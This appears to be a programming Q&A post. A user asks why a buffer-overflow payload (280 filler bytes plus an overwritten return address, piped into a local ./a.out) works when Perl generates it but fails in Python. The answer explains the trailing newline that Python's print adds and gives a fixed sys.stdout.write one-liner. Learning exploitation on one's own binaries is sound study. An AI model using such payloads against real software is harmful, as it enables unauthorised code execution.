# Why my exploit in perl work but it doesn't in python

Tags: buffer-overflow, exploit

I'm trying to exploit a buffer overflow.
I don't think it's useful to post my program in C.
This exploit work:

> (perl -e 'print "a" x 280 . "\xf6\x06\x40\x00\x00\x00\x00\x00"' ; cat) | ./a.out

But this one doesn't

> (python -c 'print("a"*280+"\xf6\x06\x40\x00\x00\x00\x00\x00")'; cat) | ./a.out

I don't see anything different except the language I use. Does anyone can tell me if is there a difference ?

Thanks

Answer (score 1):

Yes, there is a difference.  Perl's `print` function doesn't print a newline by default, while Python's does.  In Python, try:

```
(python -c 'import sys ; sys.stdout.write("a"*280+"\xf6\x06\x40\x00\x00\x00\x00\x00")'; cat) | ./a.out
```